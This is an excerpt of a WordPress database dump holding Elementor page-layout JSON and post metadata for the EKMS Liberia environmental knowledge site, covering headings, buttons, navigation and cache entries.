center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?<\\/p>\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19478,2853,'_elementor_version','2.7.5'),(19479,2853,'_elementor_template_type','wp-page'),(19480,2853,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19483,2854,'_elementor_edit_mode','builder'),(19484,2854,'_elementor_template_type','section'),(19485,2854,'_elementor_version','2.7.5'),(19486,2854,'_edit_lock','1574885328:1'),(19487,2854,'_jetpack_related_posts_cache','a:1:{s:32:\"97d2f7c5c9bcdbc88e84f474c2c91a28\";a:2:{s:7:\"expires\";i:1574885476;s:7:\"payload\";a:0:{}}}'),(19488,2624,'_edit_lock','1574885395:1'),(19489,2624,'_jetpack_related_posts_cache','a:1:{s:32:\"97d2f7c5c9bcdbc88e84f474c2c91a28\";a:2:{s:7:\"expires\";i:1574885569;s:7:\"payload\";a:0:{}}}'),(19490,30,'_jetpack_related_posts_cache','a:1:{s:32:\"ee207b3883bc9fb5b3a26f33d9aa451f\";a:2:{s:7:\"expires\";i:1628168780;s:7:\"payload\";a:0:{}}}'),(19491,2855,'_wp_page_template','elementor_canvas'),(19492,2855,'_elementor_edit_mode','builder'),(19493,2855,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.7530000000000001136868377216160297393798828125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.754999999999999005240169935859739780426025390625,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\"},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(19494,2855,'_elementor_version','2.7.5'),(19495,2855,'_elementor_template_type','wp-post'),(19500,2856,'_wp_page_template','elementor_canvas'),(19501,2856,'_elementor_edit_mode','builder'),(19502,2856,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.5379999999999967030817060731351375579833984375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":24.969999999999998863131622783839702606201171875,\"css_classes\":\"hide-1024\",\"padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true},\"animation\":\"zoomIn\"},\"elements\":[{\"id\":\"3da615e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"wp-widget-gtranslate\"},{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request to Join\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(19503,2856,'_elementor_version','2.7.5'),(19504,2856,'_elementor_template_type','wp-post'),(19508,2857,'_wp_page_template','elementor_canvas'),(19509,2857,'_elementor_edit_mode','builder'),(19510,2857,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248